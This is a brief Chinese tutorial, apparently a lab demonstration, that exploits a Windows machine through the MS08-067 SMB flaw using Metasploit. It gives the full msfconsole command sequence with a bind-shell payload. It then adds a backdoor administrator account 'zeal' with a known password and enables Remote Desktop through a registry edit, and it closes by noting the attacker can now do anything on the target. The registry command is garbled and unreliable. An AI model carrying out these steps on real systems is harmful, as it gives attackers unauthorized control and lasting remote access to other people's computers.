1,在Kali用命令 msfconsole 开启Metasploit (在终端里输入msfconsole)。
2,然后运行命令:use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序
set LHOST 192.168.116.3 #设置本地主机IP
set RHOST 192.168.116.116 #设置目标主机IP
set payload windows/shell_bind_tcp #设置payload
show options #查看设置信息
exploit #实施攻击
3,添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况。
4,发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
有了目标主机的cmdshell你想做什么不行吧?好了演示到此完毕!
